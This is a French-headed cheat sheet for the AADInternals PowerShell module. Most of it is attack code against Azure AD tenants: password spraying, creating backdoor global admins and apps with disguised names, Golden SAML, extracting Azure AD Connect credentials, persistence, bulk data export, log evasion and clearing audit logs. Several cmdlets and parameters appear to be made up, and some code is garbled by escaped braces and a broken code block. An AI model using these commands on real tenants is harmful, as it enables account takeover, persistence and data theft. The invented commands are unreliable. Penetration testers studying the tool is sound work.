AADInternals Boîte à outils d'exploitation Azure AD

Aperçu

AADInternals est un module PowerShell développé par Dr. Nestori Syynimaa pour administrer et exploiter Azure Active Directory et Office 365. Il fournit des capacités complètes pour la reconnaissance, l’exploitation et les activités post-exploitation d’Azure AD.

⚠️ Avertissement : Cet outil est destiné uniquement aux tests d’intrusion autorisés et aux évaluations de sécurité. Assurez-vous d’avoir une autorisation appropriée avant de l’utiliser dans un environnement.

Installation

Installation depuis PowerShell Gallery

# Install from PowerShell Gallery
Install-Module AADInternals

# Install specific version
Install-Module AADInternals -RequiredVersion 0.9.3

# Install for current user only
Install-Module AADInternals -Scope CurrentUser

# Update existing installation
Update-Module AADInternals

Installation Manuelle

# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/Gerenios/AADInternals/archive/master.zip" -OutFile "AADInternals.zip"
Expand-Archive -Path "AADInternals.zip" -DestinationPath "C:\Tools\"

# Import module
Import-Module C:\Tools\AADInternals-master\AADInternals.psd1

# Install dependencies
Install-Module -Name MSAL.PS
Install-Module -Name Microsoft.Graph

Installation Docker

# Run AADInternals in Docker with PowerShell
docker run -it mcr.microsoft.com/powershell:latest
pwsh -c "Install-Module AADInternals -Force; Import-Module AADInternals"

Utilisation de Base

Import et Configuration du Module

# Import AADInternals module
Import-Module AADInternals

# Get module information
Get-Module AADInternals

# List available commands
Get-Command -Module AADInternals

# Get help for specific command
Get-Help Get-AADIntAccessTokenForAADGraph -Full

Méthodes d’Authentification

# Interactive authentication
$cred = Get-Credential
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred

# Device code authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode

# Certificate authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $clientId -TenantId $tenantId

# Refresh token authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken

Référence des Commandes

Commandes d’Authentification

Commande	Description
`Get-AADIntAccessTokenForAADGraph`	Obtenir un jeton d’accès pour AAD Graph
`Get-AADIntAccessTokenForMSGraph`	Obtenir un jeton d’accès pour MS Graph
`Get-AADIntAccessTokenForEXO`	Obtenir un jeton d’accès pour Exchange Online
`Get-AADIntAccessTokenForSPO`	Obtenir un jeton d’accès pour SharePoint Online
`Get-AADIntAccessTokenForTeams`	Obtenir un jeton d’accès pour Teams

Commandes de Reconnaissance

Commande	Description
`Get-AADIntTenantID`	Obtenir l’ID de tenant à partir du domaine
`Get-AADIntTenantDomains`	Obtenir les domaines de tenant
`Get-AADIntCompanyInformation`	Obtenir les informations de l’entreprise
`Get-AADIntUsers`	Obtenir des utilisateurs Azure AD
`Get-AADIntGroups`	Obtenir des groupes Azure AD
`Get-AADIntApplications`	Obtenir des applications

Commandes d’Exploitation

Commande	Description
`New-AADIntBackdoor`	Créer un utilisateur backdoor
`Set-AADIntUserPassword`	Définir le mot de passe utilisateur
`Add-AADIntUserToGroup`	Ajouter un utilisateur au groupe
`Grant-AADIntAppRoleToServicePrincipal`	Accorder les autorisations de l’application
`New-AADIntGlobalAdmin`	Créer un administrateur global

Reconnaissance et Collecte d’Informations

Découverte de Tenant

# Get tenant ID from domain
$tenantId = Get-AADIntTenantID -Domain "company.com"

# Get tenant domains
$domains = Get-AADIntTenantDomains -Domain "company.com"

# Get company information
$companyInfo = Get-AADIntCompanyInformation -AccessToken $accessToken

# Get tenant details
$tenantDetails = Get-AADIntTenantDetails -AccessToken $accessToken

Énumération des Utilisateurs

# Get all users
$users = Get-AADIntUsers -AccessToken $accessToken

# Get specific user
$user = Get-AADIntUser -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Get user's group memberships
$groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Get user's roles
$roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Search users by attribute
$users = Get-AADIntUsers -AccessToken $accessToken -SearchString "admin"

Énumération des Groupes

# Get all groups
$groups = Get-AADIntGroups -AccessToken $accessToken

# Get group members
$members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $groupId

# Get privileged groups
$adminGroups = Get-AADIntGroups -AccessToken $accessToken|Where-Object \\\\{$_.displayName -like "*admin*"\\\\}

# Get group owners
$owners = Get-AADIntGroupOwners -AccessToken $accessToken -GroupId $groupId

Énumération des Applications et des Principaux de Service

# Get all applications
$apps = Get-AADIntApplications -AccessToken $accessToken

# Get service principals
$servicePrincipals = Get-AADIntServicePrincipals -AccessToken $accessToken

# Get application permissions
$permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $appId

# Get OAuth permissions
$oauthPerms = Get-AADIntOAuthPermissions -AccessToken $accessToken

Techniques d’Exploitation

Attaques par Mot de Passe

# Password spray attack
$users = Get-AADIntUsers -AccessToken $accessToken
$passwords = @("Password123", "Summer2024", "Company123")

foreach ($password in $passwords) \\\\{
    foreach ($user in $users) \\\\{
        try \\\\{
            $token = Get-AADIntAccessTokenForAADGraph -UserPrincipalName $user.userPrincipalName -Password $password
            Write-Host "Success: $($user.userPrincipalName):$password"
        \\\\}
        catch \\\\{
            # Password failed
        \\\\}
    \\\\}
\\\\}

# Set user password (requires privileges)
Set-AADIntUserPassword -AccessToken $accessToken -UserPrincipalName "user@company.com" -Password "NewPassword123"

Élévation de Privilèges

# Create global administrator
New-AADIntGlobalAdmin -AccessToken $accessToken -UserPrincipalName "backdoor@company.com" -Password "BackdoorPass123"

# Add user to privileged group
Add-AADIntUserToGroup -AccessToken $accessToken -UserPrincipalName "user@company.com" -GroupId $adminGroupId

# Grant application permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $spId -AppRoleId $roleId -ResourceId $resourceId

# Create application with high privileges
$app = New-AADIntApplication -AccessToken $accessToken -DisplayName "BackdoorApp" -RequiredResourceAccess $permissions

Création de Backdoor

# Create backdoor user
$backdoorUser = New-AADIntBackdoor -AccessToken $accessToken -UserPrincipalName "service-account@company.com" -Password "ComplexPassword123"

# Create backdoor application
$backdoorApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "LegitimateApp" -RequiredResourceAccess $highPrivileges

# Create service principal for backdoor
$backdoorSP = New-AADIntServicePrincipal -AccessToken $accessToken -ApplicationId $backdoorApp.appId

# Grant backdoor permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $backdoorSP.id -AppRoleId $adminRoleId

Manipulation de Jetons

# Get access token for different resources
$graphToken = Get-AADIntAccessTokenForMSGraph -AccessToken $accessToken
$exoToken = Get-AADIntAccessTokenForEXO -AccessToken $accessToken
$spoToken = Get-AADIntAccessTokenForSPO -AccessToken $accessToken

# Parse JWT token
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken

# Get refresh token
$refreshToken = Get-AADIntRefreshToken -AccessToken $accessToken

# Use refresh token for persistence
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken

Attaques Avancées

Attaque Golden SAML

# Export ADFS certificate (requires ADFS access)
$cert = Export-AADIntADFSCertificate

# Create Golden SAML token
$samlToken = New-AADIntSAMLToken -Certificate $cert -UserPrincipalName "admin@company.com" -Issuer "http://company.com/adfs/services/trust"

# Use Golden SAML to get access token
$accessToken = Get-AADIntAccessTokenForAADGraph -SAMLToken $samlToken

Attaques Azure AD Connect

# Get Azure AD Connect information
$adConnectInfo = Get-AADIntAzureADConnectInfo -AccessToken $accessToken

# Extract Azure AD Connect credentials (requires local admin on AAD Connect server)
$adConnectCreds = Get-AADIntAzureADConnectCredentials

# Use extracted credentials
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $adConnectCreds

Attaques Pass-the-Hash```powershell

Use NTLM hash for authentication

$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName “user@company.com” -Hash $ntlmHash

Use Kerberos ticket

$accessToken = Get-AADIntAccessTokenForAADGraph -KerberosTicket $ticket


### Device Registration Attacks
```powershell
# Register malicious device
$device = New-AADIntDevice -AccessToken $accessToken -DisplayName "DESKTOP-MALICIOUS" -DeviceId $deviceId

# Get device certificate
$deviceCert = Get-AADIntDeviceCertificate -AccessToken $accessToken -DeviceId $deviceId

# Use device certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $deviceCert

Persistence Techniques

Application-based Persistence

# Create persistent application
$persistentApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Graph PowerShell" -RequiredResourceAccess $permissions

# Add application secret
$secret = New-AADIntApplicationSecret -AccessToken $accessToken -ApplicationId $persistentApp.appId

# Use application for persistence
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId $persistentApp.appId -ClientSecret $secret.value -TenantId $tenantId

User-based Persistence

# Create service account
$serviceAccount = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -DisplayName "Backup Service Account" -Password "ServicePass123"

# Assign privileged roles
Add-AADIntUserToRole -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -RoleName "Global Administrator"

# Disable account auditing
Set-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -AuditingEnabled $false

Certificate-based Persistence

# Generate certificate for authentication
$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable

# Add certificate to application
Add-AADIntApplicationCertificate -AccessToken $accessToken -ApplicationId $appId -Certificate $cert

# Use certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $appId -TenantId $tenantId

Data Exfiltration

User Data Extraction

# Export all users with detailed information
$users = Get-AADIntUsers -AccessToken $accessToken
$users|Export-Csv -Path "users.csv" -NoTypeInformation

# Export user photos
foreach ($user in $users) \\\\{
    $photo = Get-AADIntUserPhoto -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
    if ($photo) \\\\{
        [System.IO.File]::WriteAllBytes("photos\$($user.userPrincipalName).jpg", $photo)
    \\\\}
\\\\}

# Export user's OneDrive files
$files = Get-AADIntUserOneDriveFiles -AccessToken $accessToken -UserPrincipalName "user@company.com"

Group and Role Information

# Export group memberships
$groups = Get-AADIntGroups -AccessToken $accessToken
foreach ($group in $groups) \\\\{
    $members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $group.id
    $group|Add-Member -NotePropertyName "Members" -NotePropertyValue $members
\\\\}
$groups|ConvertTo-Json -Depth 3|Out-File "groups.json"

# Export role assignments
$roles = Get-AADIntDirectoryRoles -AccessToken $accessToken
foreach ($role in $roles) \\\\{
    $members = Get-AADIntDirectoryRoleMembers -AccessToken $accessToken -RoleId $role.id
    $role|Add-Member -NotePropertyName "Members" -NotePropertyValue $members
\\\\}
$roles|ConvertTo-Json -Depth 3|Out-File "roles.json"

Application and Permission Data

# Export applications with permissions
$apps = Get-AADIntApplications -AccessToken $accessToken
foreach ($app in $apps) \\\\{
    $permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $app.id
    $app|Add-Member -NotePropertyName "Permissions" -NotePropertyValue $permissions
\\\\}
$apps|ConvertTo-Json -Depth 3|Out-File "applications.json"

# Export OAuth consent grants
$consents = Get-AADIntOAuthPermissions -AccessToken $accessToken
$consents|Export-Csv -Path "oauth_consents.csv" -NoTypeInformation

Evasion Techniques

Stealth Operations

# Use legitimate application names
$stealthApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Office 365" -RequiredResourceAccess $permissions

# Mimic legitimate service accounts
$stealthUser = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "o365sync@company.com" -DisplayName "Office 365 Sync Service"

# Use existing application IDs
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId "1b730954-1685-4b74-9bfd-dac224a7b894" -ClientSecret $secret  # Graph Explorer

Rate Limiting and Throttling

# Implement delays between requests
function Invoke-AADIntWithDelay \\\\{
    param($Command, $Delay = 1)

    & $Command
    Start-Sleep -Seconds $Delay
\\\\}

# Randomize request timing
$users = Get-AADIntUsers -AccessToken $accessToken
foreach ($user in $users) \\\\{
    $delay = Get-Random -Minimum 1 -Maximum 5
    Start-Sleep -Seconds $delay
    $groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
\\\\}

Log Evasion

# Use service principal instead of user account
$servicePrincipalToken = Get-AADIntAccessTokenForAADGraph -ClientId $clientId -ClientSecret $clientSecret -TenantId $tenantId

# Perform actions during business hours
$currentHour = (Get-Date).Hour
if ($currentHour -ge 9 -and $currentHour -le 17) \\\\{
    # Perform stealthy operations
\\\\}

# Use legitimate IP ranges
# Ensure operations are performed from expected geographic locations

Defensive Evasion

Anti-Detection Measures

# Check for monitoring
$auditLogs = Get-AADIntAuditLogs -AccessToken $accessToken -Filter "activityDisplayName eq 'Add application'"

# Verify current permissions
$currentPerms = Get-AADIntCurrentUserPermissions -AccessToken $accessToken

# Check for Conditional Access policies
$caPolicies = Get-AADIntConditionalAccessPolicies -AccessToken $accessToken

# Monitor for security alerts
$securityAlerts = Get-AADIntSecurityAlerts -AccessToken $accessToken

Cleanup Operations

# Remove created applications
Remove-AADIntApplication -AccessToken $accessToken -ApplicationId $backdoorApp.appId

# Remove created users
Remove-AADIntUser -AccessToken $accessToken -UserPrincipalName "backdoor@company.com"

# Remove role assignments
Remove-AADIntUserFromRole -AccessToken $accessToken -UserPrincipalName "user@company.com" -RoleName "Global Administrator"

# Clear audit logs (if possible)
Clear-AADIntAuditLogs -AccessToken $accessToken -LogType "SignInLogs"

Troubleshooting

Authentication Issues

# Debug authentication
$DebugPreference = "Continue"
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred

# Check token validity
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken
$tokenInfo.exp  # Check expiration

# Refresh expired token
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken

Permission Issues

# Check current permissions
$permissions = Get-AADIntCurrentUserPermissions -AccessToken $accessToken

# Test specific permission
Test-AADIntPermission -AccessToken $accessToken -Permission "User.Read.All"

# Get required permissions for command
Get-AADIntRequiredPermissions -Command "Get-AADIntUsers"

API Limitations

# Handle rate limiting
try \\\\{
    $users = Get-AADIntUsers -AccessToken $accessToken
\\\\}
catch \\\\{
    if ($_.Exception.Message -like "*throttled*") \\\\{
        Start-Sleep -Seconds 60
        $users = Get-AADIntUsers -AccessToken $accessToken
    \\\\}
\\\\}

# Use pagination for large datasets
$users = @()
$skip = 0
do \\\\{
    $batch = Get-AADIntUsers -AccessToken $accessToken -Top 100 -Skip $skip
    $users += $batch
    $skip += 100
\\\\} while ($batch.Count -eq 100)

Integration with Other Tools

BloodHound Integration

# Export data for BloodHound
$users = Get-AADIntUsers -AccessToken $accessToken
$groups = Get-AADIntGroups -AccessToken $accessToken

# Convert to BloodHound format
$bloodhoundData = @\\\\{
    users = $users|ForEach-Object \\\\{
        @\\\\{
            ObjectIdentifier = $_.id
            Properties = @\\\\{
                name = $_.userPrincipalName
                displayname = $_.displayName
                enabled = $_.accountEnabled
            \\\\}
        \\\\}
    \\\\}
\\\\}

$bloodhoundData|ConvertTo-Json -Depth 3|Out-File "bloodhound_data.json"

PowerShell Empire Integration

# Use AADInternals in Empire agent
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode
$users = Get-AADIntUsers -AccessToken $accessToken
$users|ConvertTo-Json|Out-File "C:\temp\aad_users.json"

Resources

AADInternals GitHub Repository
AADInternals Documentation
Dr. Nestori Syynimaa Blog [Recherche sur la sécurité Azure AD] https://www.blackhat.com/us-19/briefings/schedule/#going-rogue-azure-ad-13857[Sécurité Office 365] https://docs.microsoft.com/en-us/microsoft-365/security/*Ce aide-mémoire fournit une référence complète pour l’utilisation de AADInternals. Assurez-vous toujours d’avoir une autorisation appropriée avant de mener des évaluations de sécurité Azure AD.*